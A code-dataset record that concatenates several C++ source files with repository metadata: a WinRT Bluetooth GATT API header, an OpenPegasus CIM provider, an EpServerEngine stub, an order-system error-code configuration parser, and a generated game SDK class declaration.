bcc071359596a86f79421db470bcf768b33ae6dc
88c0e520e2389e676fea559f944109e1ee7e157b
/include/Windows.Devices.Bluetooth.GenericAttributeProfile.2_4bc8ceb3.h
1583e7c84e5f0e3c74d4cf1902127689ef8e08af
[]
no_license
jchoi2022/NtFuzz-HeaderData
fb4ecbd5399f4fac6a4982a0fb516dd7f9368118
6adc3d339e6cac072cde6cfef07eccafbc6b204c
refs/heads/main
2023-08-03T02:26:10.666986
2021-09-17T13:35:26
2021-09-17T13:35:26
407,547,359
4
0
null
null
null
null
UTF-8
C++
false
false
16,884
h
#include "winrt/impl/Windows.Devices.Bluetooth.1.h" #include "winrt/impl/Windows.Devices.Enumeration.1.h" #include "winrt/impl/Windows.Foundation.1.h" #include "winrt/impl/Windows.Storage.Streams.1.h" #include "winrt/impl/Windows.Devices.Bluetooth.GenericAttributeProfile.1.h" WINRT_EXPORT namespace winrt::Windows::Devices::Bluetooth::GenericAttributeProfile { } namespace winrt::impl { } WINRT_EXPORT namespace winrt::Windows::Devices::Bluetooth::GenericAttributeProfile { struct WINRT_EBO GattCharacteristic : Windows::Devices::Bluetooth::GenericAttributeProfile::IGattCharacteristic, impl::require<GattCharacteristic, Windows::Devices::Bluetooth::GenericAttributeProfile::IGattCharacteristic2, Windows::Devices::Bluetooth::GenericAttributeProfile::IGattCharacteristic3> { GattCharacteristic(std::nullptr_t) noexcept {} static winrt::guid ConvertShortIdToUuid(uint16_t shortId); }; struct GattCharacteristicUuids { GattCharacteristicUuids() = delete; static winrt::guid BatteryLevel(); static winrt::guid BloodPressureFeature(); static winrt::guid BloodPressureMeasurement(); static winrt::guid BodySensorLocation(); static winrt::guid CscFeature(); static winrt::guid CscMeasurement(); static winrt::guid GlucoseFeature(); static winrt::guid GlucoseMeasurement(); static winrt::guid GlucoseMeasurementContext(); static winrt::guid HeartRateControlPoint(); static winrt::guid HeartRateMeasurement(); static winrt::guid IntermediateCuffPressure(); static winrt::guid IntermediateTemperature(); static winrt::guid MeasurementInterval(); static winrt::guid RecordAccessControlPoint(); static winrt::guid RscFeature(); static winrt::guid RscMeasurement(); static winrt::guid SCControlPoint(); static winrt::guid SensorLocation(); static winrt::guid TemperatureMeasurement(); static winrt::guid TemperatureType(); static winrt::guid AlertCategoryId(); static winrt::guid AlertCategoryIdBitMask(); static winrt::guid AlertLevel(); static winrt::guid AlertNotificationControlPoint(); static winrt::guid AlertStatus(); static winrt::guid GapAppearance(); static winrt::guid BootKeyboardInputReport(); static winrt::guid BootKeyboardOutputReport(); static winrt::guid BootMouseInputReport(); static winrt::guid CurrentTime(); static winrt::guid CyclingPowerControlPoint(); static winrt::guid CyclingPowerFeature(); static winrt::guid CyclingPowerMeasurement(); static winrt::guid CyclingPowerVector(); static winrt::guid DateTime(); static winrt::guid DayDateTime(); static winrt::guid DayOfWeek(); static winrt::guid GapDeviceName(); static winrt::guid DstOffset(); static winrt::guid ExactTime256(); static winrt::guid FirmwareRevisionString(); static winrt::guid HardwareRevisionString(); static winrt::guid HidControlPoint(); static winrt::guid HidInformation(); static winrt::guid Ieee1107320601RegulatoryCertificationDataList(); static winrt::guid LnControlPoint(); static winrt::guid LnFeature(); static winrt::guid LocalTimeInformation(); static winrt::guid LocationAndSpeed(); static winrt::guid ManufacturerNameString(); static winrt::guid ModelNumberString(); static winrt::guid Navigation(); static winrt::guid NewAlert(); static winrt::guid GapPeripheralPreferredConnectionParameters(); static winrt::guid GapPeripheralPrivacyFlag(); static winrt::guid PnpId(); static winrt::guid PositionQuality(); static winrt::guid ProtocolMode(); static winrt::guid GapReconnectionAddress(); static winrt::guid ReferenceTimeInformation(); static winrt::guid Report(); static winrt::guid ReportMap(); static winrt::guid RingerControlPoint(); static winrt::guid RingerSetting(); static winrt::guid ScanIntervalWindow(); static winrt::guid ScanRefresh(); static winrt::guid SerialNumberString(); static winrt::guid GattServiceChanged(); static winrt::guid SoftwareRevisionString(); static winrt::guid SupportedNewAlertCategory(); static winrt::guid SupportUnreadAlertCategory(); static winrt::guid SystemId(); static winrt::guid TimeAccuracy(); static winrt::guid TimeSource(); static winrt::guid TimeUpdateControlPoint(); static winrt::guid TimeUpdateState(); static winrt::guid TimeWithDst(); static winrt::guid TimeZone(); static winrt::guid TxPowerLevel(); static winrt::guid UnreadAlertStatus(); }; struct WINRT_EBO GattCharacteristicsResult : Windows::Devices::Bluetooth::GenericAttributeProfile::IGattCharacteristicsResult { GattCharacteristicsResult(std::nullptr_t) noexcept {} }; struct WINRT_EBO GattClientNotificationResult : Windows::Devices::Bluetooth::GenericAttributeProfile::IGattClientNotificationResult, impl::require<GattClientNotificationResult, Windows::Devices::Bluetooth::GenericAttributeProfile::IGattClientNotificationResult2> { GattClientNotificationResult(std::nullptr_t) noexcept {} }; struct WINRT_EBO GattDescriptor : Windows::Devices::Bluetooth::GenericAttributeProfile::IGattDescriptor, impl::require<GattDescriptor, Windows::Devices::Bluetooth::GenericAttributeProfile::IGattDescriptor2> { GattDescriptor(std::nullptr_t) noexcept {} static winrt::guid ConvertShortIdToUuid(uint16_t shortId); }; struct GattDescriptorUuids { GattDescriptorUuids() = delete; static winrt::guid CharacteristicAggregateFormat(); static winrt::guid CharacteristicExtendedProperties(); static winrt::guid CharacteristicPresentationFormat(); static winrt::guid CharacteristicUserDescription(); static winrt::guid ClientCharacteristicConfiguration(); static winrt::guid ServerCharacteristicConfiguration(); }; struct WINRT_EBO GattDescriptorsResult : Windows::Devices::Bluetooth::GenericAttributeProfile::IGattDescriptorsResult { GattDescriptorsResult(std::nullptr_t) noexcept {} }; struct WINRT_EBO GattDeviceService : Windows::Devices::Bluetooth::GenericAttributeProfile::IGattDeviceService, impl::require<GattDeviceService, Windows::Devices::Bluetooth::GenericAttributeProfile::IGattDeviceService2, Windows::Devices::Bluetooth::GenericAttributeProfile::IGattDeviceService3> { GattDeviceService(std::nullptr_t) noexcept {} static Windows::Foundation::IAsyncOperation<Windows::Devices::Bluetooth::GenericAttributeProfile::GattDeviceService> FromIdAsync(param::hstring const& deviceId); static hstring GetDeviceSelectorFromUuid(winrt::guid const& serviceUuid); static hstring GetDeviceSelectorFromShortId(uint16_t serviceShortId); static winrt::guid ConvertShortIdToUuid(uint16_t shortId); static Windows::Foundation::IAsyncOperation<Windows::Devices::Bluetooth::GenericAttributeProfile::GattDeviceService> FromIdAsync(param::hstring const& deviceId, Windows::Devices::Bluetooth::GenericAttributeProfile::GattSharingMode const& sharingMode); static hstring GetDeviceSelectorForBluetoothDeviceId(Windows::Devices::Bluetooth::BluetoothDeviceId const& bluetoothDeviceId); static hstring GetDeviceSelectorForBluetoothDeviceId(Windows::Devices::Bluetooth::BluetoothDeviceId const& bluetoothDeviceId, Windows::Devices::Bluetooth::BluetoothCacheMode const& cacheMode); static hstring GetDeviceSelectorForBluetoothDeviceIdAndUuid(Windows::Devices::Bluetooth::BluetoothDeviceId const& bluetoothDeviceId, winrt::guid const& serviceUuid); static hstring GetDeviceSelectorForBluetoothDeviceIdAndUuid(Windows::Devices::Bluetooth::BluetoothDeviceId const& bluetoothDeviceId, winrt::guid const& serviceUuid, Windows::Devices::Bluetooth::BluetoothCacheMode const& cacheMode); }; struct WINRT_EBO GattDeviceServicesResult : Windows::Devices::Bluetooth::GenericAttributeProfile::IGattDeviceServicesResult { GattDeviceServicesResult(std::nullptr_t) noexcept {} }; struct WINRT_EBO GattLocalCharacteristic : Windows::Devices::Bluetooth::GenericAttributeProfile::IGattLocalCharacteristic { GattLocalCharacteristic(std::nullptr_t) noexcept {} }; struct WINRT_EBO GattLocalCharacteristicParameters : Windows::Devices::Bluetooth::GenericAttributeProfile::IGattLocalCharacteristicParameters { GattLocalCharacteristicParameters(std::nullptr_t) noexcept {} GattLocalCharacteristicParameters(); }; struct WINRT_EBO GattLocalCharacteristicResult : Windows::Devices::Bluetooth::GenericAttributeProfile::IGattLocalCharacteristicResult { GattLocalCharacteristicResult(std::nullptr_t) noexcept {} }; struct WINRT_EBO GattLocalDescriptor : Windows::Devices::Bluetooth::GenericAttributeProfile::IGattLocalDescriptor { GattLocalDescriptor(std::nullptr_t) noexcept {} }; struct WINRT_EBO GattLocalDescriptorParameters : Windows::Devices::Bluetooth::GenericAttributeProfile::IGattLocalDescriptorParameters { GattLocalDescriptorParameters(std::nullptr_t) noexcept {} GattLocalDescriptorParameters(); }; struct WINRT_EBO GattLocalDescriptorResult : Windows::Devices::Bluetooth::GenericAttributeProfile::IGattLocalDescriptorResult { GattLocalDescriptorResult(std::nullptr_t) noexcept {} }; struct WINRT_EBO GattLocalService : Windows::Devices::Bluetooth::GenericAttributeProfile::IGattLocalService { GattLocalService(std::nullptr_t) noexcept {} }; struct WINRT_EBO GattPresentationFormat : Windows::Devices::Bluetooth::GenericAttributeProfile::IGattPresentationFormat { GattPresentationFormat(std::nullptr_t) noexcept {} static uint8_t BluetoothSigAssignedNumbers(); static Windows::Devices::Bluetooth::GenericAttributeProfile::GattPresentationFormat FromParts(uint8_t formatType, int32_t exponent, uint16_t unit, uint8_t namespaceId, uint16_t description); }; struct GattPresentationFormatTypes { GattPresentationFormatTypes() = delete; static uint8_t Boolean(); static uint8_t Bit2(); static uint8_t Nibble(); static uint8_t UInt8(); static uint8_t UInt12(); static uint8_t UInt16(); static uint8_t UInt24(); static uint8_t UInt32(); static uint8_t UInt48(); static uint8_t UInt64(); static uint8_t UInt128(); static uint8_t SInt8(); static uint8_t SInt12(); static uint8_t SInt16(); static uint8_t SInt24(); static uint8_t SInt32(); static uint8_t SInt48(); static uint8_t SInt64(); static uint8_t SInt128(); static uint8_t Float32(); static uint8_t Float64(); static uint8_t SFloat(); static uint8_t Float(); static uint8_t DUInt16(); static uint8_t Utf8(); static uint8_t Utf16(); static uint8_t Struct(); }; struct GattProtocolError { GattProtocolError() = delete; static uint8_t InvalidHandle(); static uint8_t ReadNotPermitted(); static uint8_t WriteNotPermitted(); static uint8_t InvalidPdu(); static uint8_t InsufficientAuthentication(); static uint8_t RequestNotSupported(); static uint8_t InvalidOffset(); static uint8_t InsufficientAuthorization(); static uint8_t PrepareQueueFull(); static uint8_t AttributeNotFound(); static uint8_t AttributeNotLong(); static uint8_t InsufficientEncryptionKeySize(); static uint8_t InvalidAttributeValueLength(); static uint8_t UnlikelyError(); static uint8_t InsufficientEncryption(); static uint8_t UnsupportedGroupType(); static uint8_t InsufficientResources(); }; struct WINRT_EBO GattReadClientCharacteristicConfigurationDescriptorResult : Windows::Devices::Bluetooth::GenericAttributeProfile::IGattReadClientCharacteristicConfigurationDescriptorResult, impl::require<GattReadClientCharacteristicConfigurationDescriptorResult, Windows::Devices::Bluetooth::GenericAttributeProfile::IGattReadClientCharacteristicConfigurationDescriptorResult2> { GattReadClientCharacteristicConfigurationDescriptorResult(std::nullptr_t) noexcept {} }; struct WINRT_EBO GattReadRequest : Windows::Devices::Bluetooth::GenericAttributeProfile::IGattReadRequest { GattReadRequest(std::nullptr_t) noexcept {} }; struct WINRT_EBO GattReadRequestedEventArgs : Windows::Devices::Bluetooth::GenericAttributeProfile::IGattReadRequestedEventArgs { GattReadRequestedEventArgs(std::nullptr_t) noexcept {} }; struct WINRT_EBO GattReadResult : Windows::Devices::Bluetooth::GenericAttributeProfile::IGattReadResult, impl::require<GattReadResult, Windows::Devices::Bluetooth::GenericAttributeProfile::IGattReadResult2> { GattReadResult(std::nullptr_t) noexcept {} }; struct WINRT_EBO GattReliableWriteTransaction : Windows::Devices::Bluetooth::GenericAttributeProfile::IGattReliableWriteTransaction, impl::require<GattReliableWriteTransaction, Windows::Devices::Bluetooth::GenericAttributeProfile::IGattReliableWriteTransaction2> { GattReliableWriteTransaction(std::nullptr_t) noexcept {} GattReliableWriteTransaction(); }; struct WINRT_EBO GattRequestStateChangedEventArgs : Windows::Devices::Bluetooth::GenericAttributeProfile::IGattRequestStateChangedEventArgs { GattRequestStateChangedEventArgs(std::nullptr_t) noexcept {} }; struct WINRT_EBO GattServiceProvider : Windows::Devices::Bluetooth::GenericAttributeProfile::IGattServiceProvider { GattServiceProvider(std::nullptr_t) noexcept {} static Windows::Foundation::IAsyncOperation<Windows::Devices::Bluetooth::GenericAttributeProfile::GattServiceProviderResult> CreateAsync(winrt::guid const& serviceUuid); }; struct WINRT_EBO GattServiceProviderAdvertisementStatusChangedEventArgs : Windows::Devices::Bluetooth::GenericAttributeProfile::IGattServiceProviderAdvertisementStatusChangedEventArgs { GattServiceProviderAdvertisementStatusChangedEventArgs(std::nullptr_t) noexcept {} }; struct WINRT_EBO GattServiceProviderAdvertisingParameters : Windows::Devices::Bluetooth::GenericAttributeProfile::IGattServiceProviderAdvertisingParameters, impl::require<GattServiceProviderAdvertisingParameters, Windows::Devices::Bluetooth::GenericAttributeProfile::IGattServiceProviderAdvertisingParameters2> { GattServiceProviderAdvertisingParameters(std::nullptr_t) noexcept {} GattServiceProviderAdvertisingParameters(); }; struct WINRT_EBO GattServiceProviderResult : Windows::Devices::Bluetooth::GenericAttributeProfile::IGattServiceProviderResult { GattServiceProviderResult(std::nullptr_t) noexcept {} }; struct GattServiceUuids { GattServiceUuids() = delete; static winrt::guid Battery(); static winrt::guid BloodPressure(); static winrt::guid CyclingSpeedAndCadence(); static winrt::guid GenericAccess(); static winrt::guid GenericAttribute(); static winrt::guid Glucose(); static winrt::guid HealthThermometer(); static winrt::guid HeartRate(); static winrt::guid RunningSpeedAndCadence(); static winrt::guid AlertNotification(); static winrt::guid CurrentTime(); static winrt::guid CyclingPower(); static winrt::guid DeviceInformation(); static winrt::guid HumanInterfaceDevice(); static winrt::guid ImmediateAlert(); static winrt::guid LinkLoss(); static winrt::guid LocationAndNavigation(); static winrt::guid NextDstChange(); static winrt::guid PhoneAlertStatus(); static winrt::guid ReferenceTimeUpdate(); static winrt::guid ScanParameters(); static winrt::guid TxPower(); }; struct WINRT_EBO GattSession : Windows::Devices::Bluetooth::GenericAttributeProfile::IGattSession, impl::require<GattSession, Windows::Foundation::IClosable> { GattSession(std::nullptr_t) noexcept {} static Windows::Foundation::IAsyncOperation<Windows::Devices::Bluetooth::GenericAttributeProfile::GattSession> FromDeviceIdAsync(Windows::Devices::Bluetooth::BluetoothDeviceId const& deviceId); }; struct WINRT_EBO GattSessionStatusChangedEventArgs : Windows::Devices::Bluetooth::GenericAttributeProfile::IGattSessionStatusChangedEventArgs { GattSessionStatusChangedEventArgs(std::nullptr_t) noexcept {} }; struct WINRT_EBO GattSubscribedClient : Windows::Devices::Bluetooth::GenericAttributeProfile::IGattSubscribedClient { GattSubscribedClient(std::nullptr_t) noexcept {} }; struct WINRT_EBO GattValueChangedEventArgs : Windows::Devices::Bluetooth::GenericAttributeProfile::IGattValueChangedEventArgs { GattValueChangedEventArgs(std::nullptr_t) noexcept {} }; struct WINRT_EBO GattWriteRequest : Windows::Devices::Bluetooth::GenericAttributeProfile::IGattWriteRequest { GattWriteRequest(std::nullptr_t) noexcept {} }; struct WINRT_EBO GattWriteRequestedEventArgs : Windows::Devices::Bluetooth::GenericAttributeProfile::IGattWriteRequestedEventArgs { GattWriteRequestedEventArgs(std::nullptr_t) noexcept {} }; struct WINRT_EBO GattWriteResult : Windows::Devices::Bluetooth::GenericAttributeProfile::IGattWriteResult { GattWriteResult(std::nullptr_t) noexcept {} }; }
a772781717e948f13518e6644f04c0064132b1c3
9a3b9d80afd88e1fa9a24303877d6e130ce22702
/src/Providers/UNIXProviders/ComputerSystemIRQ/UNIX_ComputerSystemIRQProvider.cpp
16cc6d295c8486ebfe266b52f9f01f7ca4961a30
[ "MIT" ]
permissive
brunolauze/openpegasus-providers
3244b76d075bc66a77e4ed135893437a66dd769f
f24c56acab2c4c210a8d165bb499cd1b3a12f222
refs/heads/master
2020-04-17T04:27:14.970917
2015-01-04T22:08:09
2015-01-04T22:08:09
19,707,296
0
0
null
null
null
null
UTF-8
C++
false
false
3,873
cpp
//%LICENSE//////////////////////////////////////////////////////////////// // // Licensed to The Open Group (TOG) under one or more contributor license // agreements. Refer to the OpenPegasusNOTICE.txt file distributed with // this work for additional information regarding copyright ownership. // Each contributor licenses this file to you under the OpenPegasus Open // Source License; you may not use this file except in compliance with the // License. // // Permission is hereby granted, free of charge, to any person obtaining a // copy of this software and associated documentation files (the "Software"), // to deal in the Software without restriction, including without limitation // the rights to use, copy, modify, merge, publish, distribute, sublicense, // and/or sell copies of the Software, and to permit persons to whom the // Software is furnished to do so, subject to the following conditions: // // The above copyright notice and this permission notice shall be included // in all copies or substantial portions of the Software. // // THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS // OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF // MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. // IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY // CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, // TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE // SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. // ////////////////////////////////////////////////////////////////////////// // //%///////////////////////////////////////////////////////////////////////// #include "UNIX_ComputerSystemIRQProvider.h" using PROVIDER_LIB_NS::CIMHelper; UNIX_ComputerSystemIRQProvider::UNIX_ComputerSystemIRQProvider() { } UNIX_ComputerSystemIRQProvider::~UNIX_ComputerSystemIRQProvider() { } CIMInstance UNIX_ComputerSystemIRQProvider::constructInstance( const CIMName &className, const CIMNamespaceName &nameSpace, const UNIX_ComputerSystemIRQ &instanceObject) const { CIMProperty p; CIMInstance inst(className); // Set path inst.setPath(CIMObjectPath(String(""), // hostname nameSpace, className, constructKeyBindings(instanceObject))); //CIM_AbstractComponent Properties if (instanceObject.getGroupComponent(p)) inst.addProperty(p); if (instanceObject.getPartComponent(p)) inst.addProperty(p); if (className.equal("CIM_AbstractComponent")) return inst; //CIM_Component Properties if (className.equal("CIM_Component")) return inst; //CIM_SystemComponent Properties if (className.equal("CIM_SystemComponent")) return inst; //CIM_ResourceOfSystem Properties if (className.equal("CIM_ResourceOfSystem")) return inst; //CIM_ComputerSystemResource Properties if (className.equal("CIM_ComputerSystemResource")) return inst; //CIM_ComputerSystemIRQ Properties return inst; } Array<CIMKeyBinding> UNIX_ComputerSystemIRQProvider::constructKeyBindings(const UNIX_ComputerSystemIRQ& instanceObject) const { Array<CIMKeyBinding> keys; CIMKeyBinding GroupComponentKey( PROPERTY_GROUP_COMPONENT, CIMValue(instanceObject.getGroupComponent().getPath())); GroupComponentKey.setType(CIMKeyBinding::REFERENCE); keys.append(GroupComponentKey); CIMKeyBinding PartComponentKey( PROPERTY_PART_COMPONENT, CIMValue(instanceObject.getPartComponent().getPath())); PartComponentKey.setType(CIMKeyBinding::REFERENCE); keys.append(PartComponentKey); return keys; } #define UNIX_PROVIDER UNIX_ComputerSystemIRQProvider #define UNIX_PROVIDER_NAME "UNIX_ComputerSystemIRQProvider" #define CLASS_IMPLEMENTATION UNIX_ComputerSystemIRQ #define CLASS_IMPLEMENTATION_NAME "UNIX_ComputerSystemIRQ" #define BASE_CLASS_NAME "CIM_ComputerSystemIRQ" #define NUMKEYS_CLASS_IMPLEMENTATION 2 #include "UNIXProviderBase.hpp"
f38332aa2b0e5ded9292fb1bc083bc5385a49c5c
2ca63305557cb780e7258cf03844a420d885a0af
/EpServerEngine2.0/EpServerEngine/Sources/epServerInterface.cpp
f93a69a8ab74cd69b87b581293e1b290f2e1309c
[ "MIT" ]
permissive
wangscript007/EpServerEngine
e0181d493ad9f46209536ad77a52d86bdadce7f1
2a79ddbfc118d3d653f5b0a4110eae2fc287b965
refs/heads/master
2021-09-13T02:37:20.025331
2018-04-24T01:51:04
2018-04-24T01:51:04
null
0
0
null
null
null
null
UTF-8
C++
false
false
1,438
cpp
/*! ServerInterface for the EpServerEngine The MIT License (MIT) Copyright (c) 2012-2013 Woong Gyu La <[email protected]> Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. */ #include "epServerInterfaces.h" #if defined(_DEBUG) && defined(EP_ENABLE_CRTDBG) #define new DEBUG_NEW #undef THIS_FILE static char THIS_FILE[] = __FILE__; #endif // defined(_DEBUG) && defined(EP_ENABLE_CRTDBG) using namespace epse; ServerOps ServerOps::defaultServerOps=ServerOps();
3b78ea25b39e29d2d976428879ea0bf75c7aa1f4
ea7372b7a12fc3017489873d6743a6daa98d3cb7
/f9omstw/OmsErrCodeAct.cpp
ab324a4517c933867cd119ccfc47f577c72c2238
[ "Apache-2.0" ]
permissive
fonwin/f9omstw
c1b238716ccd1077fa8ede4a280ca63347f2fa97
6afd3b9e58b215ccbf75a5592c9b813d6f8a2fd1
refs/heads/master
2023-08-16T21:34:15.815453
2023-08-14T08:41:14
2023-08-14T08:41:14
186,222,750
5
2
Apache-2.0
2023-06-13T01:21:33
2019-05-12T07:03:03
C++
UTF-8
C++
false
false
6,158
cpp
// \file f9omstw/OmsErrCodeAct.cpp // \author [email protected] #include "f9omstw/OmsErrCodeAct.hpp" #include "f9omstw/OmsOrder.hpp" namespace f9omstw { #define kCSTR_During "During" #define kCSTR_NewSrc "NewSrc" #define kCSTR_Src "Src" #define kCSTR_OType "OType" #define kCSTR_UseNewLine "UseNewLine" #define kCSTR_AtNewDone "AtNewDone" #define kCSTR_NewSending "NewSending" #define kCSTR_St "St" #define kCSTR_Rerun "Rerun" #define kCSTR_ErrCode "ErrCode" #define kCSTR_ResetOkErrCode "ResetOkErrCode" #define kCSTR_Memo "Memo" static void AssignSrc(fon9::CharVector& dst, fon9::StrView src) { dst.clear(); while (!src.empty()) { fon9::StrView val = fon9::StrFetchTrim(src, ','); if (val.empty()) continue; if (!dst.empty()) dst.push_back(','); dst.append(val); } } fon9_WARN_DISABLE_PADDING; struct RequestStDef { f9fmkt_TradingRequestSt St_; fon9::StrView StName_; }; fon9_WARN_POP; #define DEF_RequestStDef(st) { f9fmkt_TradingRequestSt_##st, fon9::StrView{#st} } static const RequestStDef StrRequestSt[]{ DEF_RequestStDef(ExchangeNoLeavesQty), DEF_RequestStDef(ExchangeCanceling), DEF_RequestStDef(ExchangeCanceled), }; f9fmkt_TradingRequestSt StrToRequestSt(fon9::StrView value) { for (const auto& st : StrRequestSt) { if (st.StName_ == value) return st.St_; } return StrTo(value, f9fmkt_TradingRequestSt{}); } //--------------------------------------------------------------------------// const char* OmsErrCodeAct::ParseFrom(fon9::StrView cfgstr, std::string* msg) { fon9::StrView tag, value; while (fon9::StrFetchTagValue(cfgstr, tag, value)) { if (tag == kCSTR_During) { this->BeginTime_ = StrTo(&value, fon9::DayTime::Null()); if (fon9::StrTrim(&value).Get1st() != '-') this->EndTime_.AssignNull(); else { fon9::StrTrimHead(&value, value.begin() + 1); this->EndTime_ = StrTo(&value, fon9::DayTime::Null()); } } else if (tag == kCSTR_NewSrc) { AssignSrc(this->NewSrcs_, value); } else if (tag == kCSTR_Src) { AssignSrc(this->Srcs_, value); } else if (tag == kCSTR_OType) { this->OTypes_.clear(); for (char ch : value) { if (ch != ',' && !fon9::isspace(static_cast<unsigned char>(ch))) this->OTypes_.push_back(ch); } } else if (tag == kCSTR_NewSending) { this->NewSending_ = fon9::StrTo(value, this->NewSending_); } else if (tag == kCSTR_AtNewDone) { this->IsAtNewDone_ = (fon9::toupper(value.Get1st()) == 'Y'); } else if (tag == kCSTR_UseNewLine) { this->IsUseNewLine_ = (fon9::toupper(value.Get1st()) == 'Y'); } else if (tag == kCSTR_St) { if ((this->ReqSt_ = StrToRequestSt(value)) == f9fmkt_TradingRequestSt{}) { if (msg) *msg = value.ToString("Unknown St: "); return value.begin(); } } else if (tag == kCSTR_Rerun) { this->RerunTimes_ = fon9::StrTo(value, this->RerunTimes_); } else if (tag == kCSTR_ErrCode) { this->ReErrCode_ = static_cast<OmsErrCode>(fon9::StrTo(value, fon9::cast_to_underlying(this->ReErrCode_))); this->IsResetOkErrCode_ = false; } else if (tag == kCSTR_ResetOkErrCode) { this->ReErrCode_ = OmsErrCode_MaxV; this->IsResetOkErrCode_ = (fon9::toupper(value.Get1st()) == 'Y'); } else if (tag == kCSTR_Memo) { this->Memo_ = value.ToString(); } else { if (msg) *msg = tag.ToString("Unknown tag: "); return tag.begin(); } } this->ConfigStr_ = fon9::RevPrintTo<std::string>(*this); return nullptr; } void RevPrint(fon9::RevBuffer& rbuf, const OmsErrCodeAct& act) { struct SplAux { bool NeedsSpl_{false}; void operator()(fon9::RevBuffer& rbuf) { if (this->NeedsSpl_) fon9::RevPrint(rbuf, '|'); else this->NeedsSpl_ = true; } }; SplAux splaux; if (!act.BeginTime_.IsNull() || !act.EndTime_.IsNull()) { splaux(rbuf); fon9::RevPrint(rbuf, kCSTR_During "=", act.BeginTime_, '-', act.EndTime_); } if (!act.NewSrcs_.empty()) { splaux(rbuf); fon9::RevPrint(rbuf, kCSTR_NewSrc "=", act.NewSrcs_); } if (!act.Srcs_.empty()) { splaux(rbuf); fon9::RevPrint(rbuf, kCSTR_Src "=", act.Srcs_); } if (!act.OTypes_.empty()) { splaux(rbuf); fon9::RevPrint(rbuf, kCSTR_OType "=", act.OTypes_); } if (act.NewSending_.GetOrigValue() > 0) { splaux(rbuf); fon9::RevPrint(rbuf, kCSTR_NewSending "=", act.NewSending_); } if (act.IsAtNewDone_) { splaux(rbuf); fon9::RevPrint(rbuf, kCSTR_AtNewDone "=Y"); } if (act.IsUseNewLine_) { splaux(rbuf); fon9::RevPrint(rbuf, kCSTR_UseNewLine "=Y"); } if (act.ReqSt_) { splaux(rbuf); for (const auto& st : StrRequestSt) { if (act.ReqSt_ == st.St_) { fon9::RevPrint(rbuf, ':', st.StName_); break; } } fon9::RevPrint(rbuf, kCSTR_St "=", act.ReqSt_); } if (act.RerunTimes_) { splaux(rbuf); fon9::RevPrint(rbuf, kCSTR_Rerun "=", act.RerunTimes_); } if (act.ReErrCode_ != OmsErrCode_MaxV) { splaux(rbuf); fon9::RevPrint(rbuf, kCSTR_ErrCode "=", act.ReErrCode_); } if (act.IsResetOkErrCode_) { splaux(rbuf); fon9::RevPrint(rbuf, kCSTR_ResetOkErrCode "=Y"); } } bool OmsErrCodeAct::CheckTime(fon9::DayTime now) const { if (this->BeginTime_.IsNull()) { if (this->EndTime_.IsNull()) return true; return now <= this->EndTime_; } if (this->EndTime_.IsNull()) return this->BeginTime_ <= now; if (this->BeginTime_ < this->EndTime_) return this->BeginTime_ <= now && now <= this->EndTime_; return this->BeginTime_ <= now || now <= this->EndTime_; } } // namespaces
085d3fe051048f745c4b9515aa16b0b27fedb04d
d3e1f9a07e09953ac689c74ad1f7f1ada982dd77
/SDK/BTDecorator_IsCanOpenDoor_classes.h
4bce035cf19320b17921c67c90c24a36d5f844b3
[]
no_license
xnf4o/HSH_SURVIVE_SDK
5857159731ceda7c06e158711003fbaf22021842
2f49c97a5f14b4eadf7dc3387b55c09bc968da66
refs/heads/main
2023-04-12T06:52:47.854249
2021-04-27T03:13:24
2021-04-27T03:13:24
361,965,544
0
0
null
null
null
null
UTF-8
C++
false
false
900
h
#pragma once // Name: hsh, Version: 2 /*!!DEFINE!!*/ /*!!HELPER_DEF!!*/ /*!!HELPER_INC!!*/ #ifdef _MSC_VER #pragma pack(push, 0x01) #endif namespace CG { //--------------------------------------------------------------------------- // Classes //--------------------------------------------------------------------------- // BlueprintGeneratedClass BTDecorator_IsCanOpenDoor.BTDecorator_IsCanOpenDoor_C // 0x0000 (FullSize[0x00A8] - InheritedSize[0x00A8]) class UBTDecorator_IsCanOpenDoor_C : public UBTDecorator_BlueprintBase { public: static UClass* StaticClass() { static auto ptr = nullptr; if (!ptr) ptr = UObject::FindClass("BlueprintGeneratedClass BTDecorator_IsCanOpenDoor.BTDecorator_IsCanOpenDoor_C"); return ptr; } bool PerformConditionCheckAI(class AAIController* OwnerController, class APawn* ControlledPawn); }; } #ifdef _MSC_VER #pragma pack(pop) #endif
a55fe5523241e60040bf53eac1fa192bf05bfbfe
95ab8a21dda989fde5b0796d1488c30128a01391
/CodeForces/C++/1384A.cpp
f8e3e9943ee11d2e723afd811462cd0631b0c0b3
[]
no_license
neelaryan2/CompetitiveProgramming
caa20ffcdee57fb2e15ceac0e7ebbe4e7277dc34
959c3092942751f833b489cc91744fc68f8c65d2
refs/heads/master
2021-06-28T14:10:50.545527
2021-02-15T17:34:03
2021-02-15T17:34:03
216,887,910
2
1
null
null
null
null
UTF-8
C++
false
false
1,261
cpp
